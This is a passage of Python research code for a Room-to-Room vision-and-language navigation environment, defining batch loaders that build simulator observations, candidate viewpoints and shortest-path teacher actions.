new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], 0)
new_item['instructions'] = ''
self.data.append(new_item)
scans.append(item['scan'])
else:
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if 'seg' in item:
if str(j) in item['seg']:
# print(j)
new_item['seg'] = item['seg'][str(j)]
else:
continue
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
if record_scans is not None:
scans = record_scans
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.buffered_state_dict_detail = {}
self.batch = None
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
if splits is not None:
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(['None'] if splits is None else splits)))
def split(self, num):
sub_batch_size = int(self.env.batch_size / num)
sub_envs = []
n = list([int(len(self.data) * 1.0 * i / num) for i in range(num+1)])
data_split = []
for i in range(num):
data_split.append(self.data[n[i]:n[i+1]])
# [self.data[n[i]:n[i+1]] for i in range(num)]
feature_store = self.env.features
for i in range(num):
env = R2RBatch(feature_store, sub_batch_size, seed= self.seed, splits=None, tokenizer=self.tok, name=self.name)
env.data = data_split[i]
env.scans = self.scans
sub_envs.append(env)
return sub_envs
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
# print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
# @profile
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
long_id_detail = '%s_%s'%(long_id, viewId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
self.buffered_state_dict_detail[long_id_detail] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx','heading','feature']}
for c in candidate
]
return candidate
elif long_id_detail not in self.buffered_state_dict_detail:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
candidate_new.append(c_new)
self.buffered_state_dict_detail[long_id_detail] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx','heading','feature']}
for c in candidate_new
]
return candidate_new
else:
return self.buffered_state_dict_detail[long_id_detail]
# @profile
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# print('in 1')
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# print('in 2')
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id'],
'seg': item['seg'] if 'seg' in item else None
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
# print('in 3')
return obs
def _get_obs_fake(self,dest):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'teacher' : self._shortest_path_action(state, dest),
})
return obs
def _get_path_length(self):
length = []
for item in self.batch:
path = self.paths[item['scan']][item['path'][0]][item['path'][-1]]
length.append(len(path))
return length
def _get_progress(self, obs):
res = []
vps = [ob['viewpoint'] for ob in obs]
for i, item in enumerate(self.batch):
v = vps[i]
a = len(self.paths[item['scan']][item['path'][0]][v])
b = len(self.paths[item['scan']][v][item['path'][-1]])
res.append(1.0*a/(a+b-1))
return np.array(res)
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_preload():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.q = queue.Queue(1)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def fetch_data():
while True:
batch = self._getbatch()
self.q.put(batch)
# print('finish')
self.th = threading.Thread(target=fetch_data)
self.th.start()
self.one_batch = None
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
# print(state.scanId, state.location.viewpointId, goalViewpointId)
# if not goalViewpointId in self.paths[state.scanId][state.location.viewpointId]:
# print(state.scanId, state.location.viewpointId, goalViewpointId, item)
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
if item['scan'] != state.scanId:
scans_a = [state[1].scanId for state in self.env.getStates()]
scans_b = [item['scan'] for item in self.batch]
scans_ab = [(a,b) for a,b in zip(scans_a,scans_b)]
print(scans_ab)
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
def make_equiv_action(self, a_t, perm_obs):
"""
Interface between Panoramic view and Egocentric view
It will convert the action panoramic view action a_t to equivalent egocentric view actions for the simulator
"""
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
def take_action(i, idx, name):
if type(name) is int: # Go to the next view
self.env.sims[idx].makeAction(name, 0, 0)
else: # Adjust
self.env.sims[idx].makeAction(*env_actions[name])
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12 # The point idx started from 0
trg_level = (trg_point ) // 12
# print(src_level, trg_level, self.env.sims[idx].getState().viewIndex, trg_point)
while src_level < trg_level: # Tune up
take_action(i, idx, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, idx, 'down')
src_level -= 1
# print('yes')
while self.env.sims[idx].getState().viewIndex != trg_point: # Turn right until the target
take_action(i, idx, 'right')
# print(self.env.sims[idx].getState().viewIndex)
assert select_candidate['viewpointId'] == \
self.env.sims[idx].getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, idx, select_candidate['idx'])
def _teacher_action(self, obs, ended):
"""
Extract teacher actions into variable.
:param obs: The observation.
:param ended: Whether the action seq is ended
:return:
"""
a = np.zeros(len(obs), dtype=np.int64)
for i, ob in enumerate(obs):
if ended[i]: # Just ignore this index
a[i] = args.ignoreid
else:
for k, candidate in enumerate(ob['candidate']):
if candidate['viewpointId'] == ob['teacher']: # Next view point
a[i] = k
break
else: # Stop here
assert ob['teacher'] == ob['viewpoint'] # The teacher action should be "STAY HERE"
a[i] = len(ob['candidate'])
return a
def _getbatch(self):
obs = np.array(self.reset())
ended = np.array([False] * self.batch_size) # Indices match permuation of the model, not env
length = 10
obs_list = []
# obs_list.append(obs)
exp_list = []
action_list = []
for t in range(length):
candidate_batch = []
mask_batch = []
scanIds = [ob['scan'] for ob in obs]
viewpoints = [ob['viewpoint'] for ob in obs]
headings = [ob['heading'] for ob in obs]
elevations = [ob['elevation'] for ob in obs]
candidate_leng = [len(ob['candidate']) for ob in obs]
max_length = max(candidate_leng)
for i in range(max_length):
a = np.zeros(len(obs), dtype=np.int64)
mask = np.zeros(len(obs), dtype=np.int64)
for j, ob in enumerate(obs):
if i >= len(ob['candidate']):
a[j] = -1
else:
a[j] = i
mask[j] = 1
self.make_equiv_action(a, obs)
obs_cand = np.array(self._get_obs())
candidate_batch.append(obs_cand)
mask_batch.append(mask)
self.env.newEpisodes(scanIds,viewpoints,headings,elevations)
candidate_batch = np.array(candidate_batch).transpose() # batch x max_cand_length (obs)
mask_batch = np.array(mask_batch).transpose() # batch x max_cand_length (mask)
a_t = self._teacher_action(obs, ended)
obs_list.append(obs)
exp_list.append((candidate_batch, mask_batch))
action_list.append(np.array(a_t))
for i, next_id in enumerate(a_t):
if next_id == candidate_leng[i] or next_id == args.ignoreid: # The last action is <end>
a_t[i] = -1 # Change the <end> and ignore action to -1
if ended.all():
break
self.make_equiv_action(a_t, obs)
obs = np.array(self._get_obs())
ended[:] = np.logical_or(ended, (a_t == -1))
# assert len(obs_list) == len(exp_list)
return obs_list, exp_list, action_list
def getbatch(self):
res = self.q.get()
return res
def getbatch_fake(self):
if self.one_batch is None:
self.one_batch = self.q.get()
# res = self.q.get()
res = self.one_batch
return res
class R2RBatch_preload_P():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch_T(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.q = queue.Queue(100)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def fetch_data():
while True:
batch = self._getbatch()
self.q.put(batch)
# print('finish')
self.th = threading.Thread(target=fetch_data)
self.th.start()
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
def make_equiv_action(self, a_t, perm_obs):
"""
Interface between Panoramic view and Egocentric view
It will convert the action panoramic view action a_t to equivalent egocentric view actions for the simulator
"""
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
def take_action(i, idx, name):
